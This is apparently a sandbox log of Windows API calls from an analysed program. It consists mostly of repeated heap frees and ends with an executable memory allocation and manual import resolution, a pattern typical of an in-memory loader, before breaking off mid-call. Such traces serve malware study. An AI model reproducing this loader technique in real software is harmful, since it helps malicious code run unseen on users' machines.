1 [0264.680] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x22f5390 | out: hHeap=0x470000) returned 1 [0264.680] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x23085a0 | out: hHeap=0x470000) returned 1 [0264.680] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x231b7b0 | out: hHeap=0x470000) returned 1 [0264.680] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x232e9c0 | out: hHeap=0x470000) returned 1 [0264.680] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2341bd0 | out: hHeap=0x470000) returned 1 [0264.680] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2354de0 | out: hHeap=0x470000) returned 1 [0264.680] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2367ff0 | out: hHeap=0x470000) returned 1 [0264.684] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x237b200 | out: hHeap=0x470000) returned 1 [0264.685] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x238e410 | out: hHeap=0x470000) returned 1 [0264.685] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x23a1620 | out: hHeap=0x470000) returned 1 [0264.686] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x23b4830 | out: hHeap=0x470000) returned 1 [0264.688] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x23c7a40 | out: hHeap=0x470000) returned 1 [0264.688] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x23dac50 | out: hHeap=0x470000) returned 1 [0264.688] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x23ede60 | out: hHeap=0x470000) returned 1 [0264.688] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2401070 | out: hHeap=0x470000) returned 1 [0264.689] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2414280 | out: hHeap=0x470000) returned 1 [0264.689] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2427490 | out: hHeap=0x470000) returned 1 [0264.689] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x243a6a0 | out: hHeap=0x470000) returned 1 [0264.689] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x244d8b0 | out: hHeap=0x470000) returned 1 [0264.689] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2460ac0 | out: hHeap=0x470000) returned 1 [0264.689] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2473cd0 | out: hHeap=0x470000) returned 1 [0264.689] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2486ee0 | out: hHeap=0x470000) returned 1 [0264.689] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x249a0f0 | out: hHeap=0x470000) returned 1 [0264.689] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x24ad300 | out: hHeap=0x470000) returned 1 [0264.689] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x24c0510 | out: hHeap=0x470000) returned 1 [0264.693] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x24d3720 | out: hHeap=0x470000) returned 1 [0264.693] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x24e6930 | out: hHeap=0x470000) returned 1 [0264.694] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x24f9b40 | out: hHeap=0x470000) returned 1 [0264.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x250cd50 | out: hHeap=0x470000) returned 1 [0264.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x251ff60 | out: hHeap=0x470000) returned 1 [0264.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2533170 | out: hHeap=0x470000) returned 1 [0264.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2546380 | out: hHeap=0x470000) returned 1 [0264.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2559590 | out: hHeap=0x470000) returned 1 [0264.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x256c7a0 | out: hHeap=0x470000) returned 1 [0264.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x257f9b0 | out: hHeap=0x470000) returned 1 [0264.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2592bc0 | out: hHeap=0x470000) returned 1 [0264.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x25b0080 | out: hHeap=0x470000) returned 1 [0264.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x25c3290 | out: hHeap=0x470000) returned 1 [0264.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x25d64a0 | out: hHeap=0x470000) returned 1 [0264.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x25e96b0 | out: hHeap=0x470000) returned 1 [0264.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x25fc8c0 | out: hHeap=0x470000) returned 1 [0264.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x260fad0 | out: hHeap=0x470000) returned 1 [0264.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2622ce0 | out: hHeap=0x470000) returned 1 [0264.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2635ef0 | out: hHeap=0x470000) returned 1 [0264.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2649100 | out: hHeap=0x470000) returned 1 [0264.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x265c310 | out: hHeap=0x470000) returned 1 [0264.702] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x266f520 | out: hHeap=0x470000) returned 1 [0264.704] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2682730 | out: hHeap=0x470000) returned 1 [0264.704] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2695940 | out: hHeap=0x470000) returned 1 [0264.704] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x26a8b50 | out: hHeap=0x470000) returned 1 [0264.708] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x26bbd60 | out: hHeap=0x470000) returned 1 [0264.708] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x26cef70 | out: hHeap=0x470000) returned 1 [0264.708] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x26e2180 | out: hHeap=0x470000) returned 1 [0264.708] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x26f5390 | out: hHeap=0x470000) returned 1 [0264.708] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x27085a0 | out: hHeap=0x470000) returned 1 [0264.708] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x271b7b0 | out: hHeap=0x470000) returned 1 [0264.708] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x272e9c0 | out: hHeap=0x470000) returned 1 [0264.708] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2741bd0 | out: hHeap=0x470000) returned 1 [0264.708] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2754de0 | out: hHeap=0x470000) returned 1 [0264.708] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2767ff0 | out: hHeap=0x470000) returned 1 [0264.708] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x277b200 | out: hHeap=0x470000) returned 1 [0264.708] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x278e410 | out: hHeap=0x470000) returned 1 [0264.708] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x27a1620 | out: hHeap=0x470000) returned 1 [0264.708] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x27b4830 | out: hHeap=0x470000) returned 1 [0264.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x27c7a40 | out: hHeap=0x470000) returned 1 [0264.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x27dac50 | out: hHeap=0x470000) returned 1 [0264.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x27ede60 | out: hHeap=0x470000) returned 1 [0264.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2801070 | out: hHeap=0x470000) returned 1 [0264.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2814280 | out: hHeap=0x470000) returned 1 [0264.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2827490 | out: hHeap=0x470000) returned 1 [0264.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x283a6a0 | out: hHeap=0x470000) returned 1 [0264.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x284d8b0 | out: hHeap=0x470000) returned 1 [0264.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2860ac0 | out: hHeap=0x470000) returned 1 [0264.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2873cd0 | out: hHeap=0x470000) returned 1 [0264.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2886ee0 | out: hHeap=0x470000) returned 1 [0264.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x289a0f0 | out: hHeap=0x470000) returned 1 [0264.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x28ad300 | out: hHeap=0x470000) returned 1 [0264.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x28c0510 | out: hHeap=0x470000) returned 1 [0264.845] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x28d3720 | out: hHeap=0x470000) returned 1 [0264.845] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x28e6930 | out: hHeap=0x470000) returned 1 [0264.845] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x28f9b40 | out: hHeap=0x470000) returned 1 [0264.845] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x290cd50 | out: hHeap=0x470000) returned 1 [0264.846] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x291ff60 | out: hHeap=0x470000) returned 1 [0264.847] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2933170 | out: hHeap=0x470000) returned 1 [0264.848] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2946380 | out: hHeap=0x470000) returned 1 [0264.848] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2959590 | out: hHeap=0x470000) returned 1 [0264.848] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x296c7a0 | out: hHeap=0x470000) returned 1 [0264.848] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x297f9b0 | out: hHeap=0x470000) returned 1 [0264.848] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2992bc0 | out: hHeap=0x470000) returned 1 [0264.848] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x29a5dd0 | out: hHeap=0x470000) returned 1 [0264.848] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x29b8fe0 | out: hHeap=0x470000) returned 1 [0264.848] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x29cc1f0 | out: hHeap=0x470000) returned 1 [0264.853] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x29df400 | out: hHeap=0x470000) returned 1 [0264.853] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x29f2610 | out: hHeap=0x470000) returned 1 [0264.853] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2a05820 | out: hHeap=0x470000) returned 1 [0264.853] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2a18a30 | out: hHeap=0x470000) returned 1 [0264.853] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2a2bc40 | out: hHeap=0x470000) returned 1 [0264.856] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2a3ee50 | out: hHeap=0x470000) returned 1 [0264.856] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2a52060 | out: hHeap=0x470000) returned 1 [0264.856] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2a65270 | out: hHeap=0x470000) returned 1 [0264.856] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2a78480 | out: hHeap=0x470000) returned 1 [0264.857] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2a8b690 | out: hHeap=0x470000) returned 1 [0264.857] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2a9e8a0 | out: hHeap=0x470000) returned 1 [0264.857] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2ab1ab0 | out: hHeap=0x470000) returned 1 [0264.857] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2ac4cc0 | out: hHeap=0x470000) returned 1 [0264.857] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2ad7ed0 | out: hHeap=0x470000) returned 1 [0264.860] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2aeb0e0 | out: hHeap=0x470000) returned 1 [0264.860] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2afe2f0 | out: hHeap=0x470000) returned 1 [0264.860] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2b11500 | out: hHeap=0x470000) returned 1 [0264.860] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2b24710 | out: hHeap=0x470000) returned 1 [0264.860] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2b37920 | out: hHeap=0x470000) returned 1 [0264.860] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2b4ab30 | out: hHeap=0x470000) returned 1 [0264.862] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2b5dd40 | out: hHeap=0x470000) returned 1 [0264.863] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2b70f50 | out: hHeap=0x470000) returned 1 [0264.863] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2b84160 | out: hHeap=0x470000) returned 1 [0264.863] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2b97370 | out: hHeap=0x470000) returned 1 [0264.863] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2baa580 | out: hHeap=0x470000) returned 1 [0264.863] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2bbd790 | out: hHeap=0x470000) returned 1 [0264.863] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2bd09a0 | out: hHeap=0x470000) returned 1 [0264.863] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2be3bb0 | out: hHeap=0x470000) returned 1 [0264.868] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2bf6dc0 | out: hHeap=0x470000) returned 1 [0264.868] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2c09fd0 | out: hHeap=0x470000) returned 1 [0264.868] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2c1d1e0 | out: hHeap=0x470000) returned 1 [0264.868] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2c303f0 | out: hHeap=0x470000) returned 1 [0264.868] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2c43600 | out: hHeap=0x470000) returned 1 [0264.869] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2c56810 | out: hHeap=0x470000) returned 1 [0264.871] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2c69a20 | out: hHeap=0x470000) returned 1 [0264.872] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2c7cc30 | out: hHeap=0x470000) returned 1 [0264.872] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2c8fe40 | out: hHeap=0x470000) returned 1 [0264.872] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2ca3050 | out: hHeap=0x470000) returned 1 [0264.872] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2cb6260 | out: hHeap=0x470000) returned 1 [0264.872] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2cc9470 | out: hHeap=0x470000) returned 1 [0264.872] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2cdc680 | out: hHeap=0x470000) returned 1 [0264.872] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2cef890 | out: hHeap=0x470000) returned 1 [0264.958] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d02aa0 | out: hHeap=0x470000) returned 1 [0264.958] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d15cb0 | out: hHeap=0x470000) returned 1 [0264.958] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d28ec0 | out: hHeap=0x470000) returned 1 [0264.959] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d3c0d0 | out: hHeap=0x470000) returned 1 [0264.959] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d4f2e0 | out: hHeap=0x470000) returned 1 [0264.960] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d624f0 | out: hHeap=0x470000) returned 1 [0264.961] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d75700 | out: hHeap=0x470000) returned 1 [0264.961] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d88910 | out: hHeap=0x470000) returned 1 [0264.961] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2db0080 | out: hHeap=0x470000) returned 1 [0264.962] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2dc3290 | out: hHeap=0x470000) returned 1 [0264.962] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2dd64a0 | out: hHeap=0x470000) returned 1 [0264.962] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2de96b0 | out: hHeap=0x470000) returned 1 [0264.962] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2dfc8c0 | out: hHeap=0x470000) returned 1 [0264.962] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2e0fad0 | out: hHeap=0x470000) returned 1 [0264.962] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2e22ce0 | out: hHeap=0x470000) returned 1 [0264.962] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2e35ef0 | out: hHeap=0x470000) returned 1 [0264.962] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2e49100 | out: hHeap=0x470000) returned 1 [0264.966] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2e5c310 | out: hHeap=0x470000) returned 1 [0264.968] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2e6f520 | out: hHeap=0x470000) returned 1 [0264.968] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2e82730 | out: hHeap=0x470000) returned 1 [0264.968] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2e95940 | out: hHeap=0x470000) returned 1 [0264.968] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2ea8b50 | out: hHeap=0x470000) returned 1 [0264.972] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2ebbd60 | out: hHeap=0x470000) returned 1 [0264.972] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2ecef70 | out: hHeap=0x470000) returned 1 [0264.972] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2ee2180 | out: hHeap=0x470000) returned 1 [0264.972] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2ef5390 | out: hHeap=0x470000) returned 1 [0264.972] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2f085a0 | out: hHeap=0x470000) returned 1 [0264.972] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2f1b7b0 | out: hHeap=0x470000) returned 1 [0264.975] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2f2e9c0 | out: hHeap=0x470000) returned 1 [0264.976] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2f41bd0 | out: hHeap=0x470000) returned 1 [0264.976] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2f54de0 | out: hHeap=0x470000) returned 1 [0264.976] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2f67ff0 | out: hHeap=0x470000) returned 1 [0264.976] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2f7b200 | out: hHeap=0x470000) returned 1 [0264.976] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2f8e410 | out: hHeap=0x470000) returned 1 [0264.976] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2fa1620 | out: hHeap=0x470000) returned 1 [0264.976] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2fb4830 | out: hHeap=0x470000) returned 1 [0264.982] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2fc7a40 | out: hHeap=0x470000) returned 1 [0264.982] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2fdac50 | out: hHeap=0x470000) returned 1 [0264.983] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2fede60 | out: hHeap=0x470000) returned 1 [0264.983] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3001070 | out: hHeap=0x470000) returned 1 [0264.983] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3014280 | out: hHeap=0x470000) returned 1 [0264.983] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3027490 | out: hHeap=0x470000) returned 1 [0264.983] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x303a6a0 | out: hHeap=0x470000) returned 1 [0264.983] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x304d8b0 | out: hHeap=0x470000) returned 1 [0264.983] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3060ac0 | out: hHeap=0x470000) returned 1 [0264.983] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3073cd0 | out: hHeap=0x470000) returned 1 [0264.984] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3086ee0 | out: hHeap=0x470000) returned 1 [0264.984] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x309a0f0 | out: hHeap=0x470000) returned 1 [0264.989] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x30ad300 | out: hHeap=0x470000) returned 1 [0265.121] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x30c0510 | out: hHeap=0x470000) returned 1 [0265.124] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x30d3720 | out: hHeap=0x470000) returned 1 [0266.092] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0266.117] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0266.118] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0266.119] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0266.119] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0266.119] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0266.119] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0266.119] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0266.120] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0266.120] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0266.120] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0266.120] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0266.120] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0266.120] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0266.120] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0266.120] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0266.121] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0266.121] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0266.121] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0266.121] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0266.121] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0266.121] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0266.122] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0266.122] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0266.122] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0266.122] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0266.122] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0266.123] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x49db40 | out: hHeap=0x470000) returned 1 [0266.124] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bd940 | out: hHeap=0x470000) returned 1 [0266.128] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47ffa0 | out: hHeap=0x470000) returned 1 [0266.133] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0266.134] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0266.134] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0266.134] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0266.135] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0266.135] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0266.138] GetProcessHeap () returned 0x470000 [0266.138] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x68) returned 0x478d40 [0266.138] GetProcessHeap () returned 0x470000 [0266.138] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4890c0 [0266.139] GetProcessHeap () returned 0x470000 [0266.139] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x48) returned 0x480400 [0266.140] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0266.140] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0266.140] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0266.140] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0266.140] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0266.140] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0266.140] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0266.140] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0266.141] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0266.141] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0266.141] GetModuleFileNameA (in: 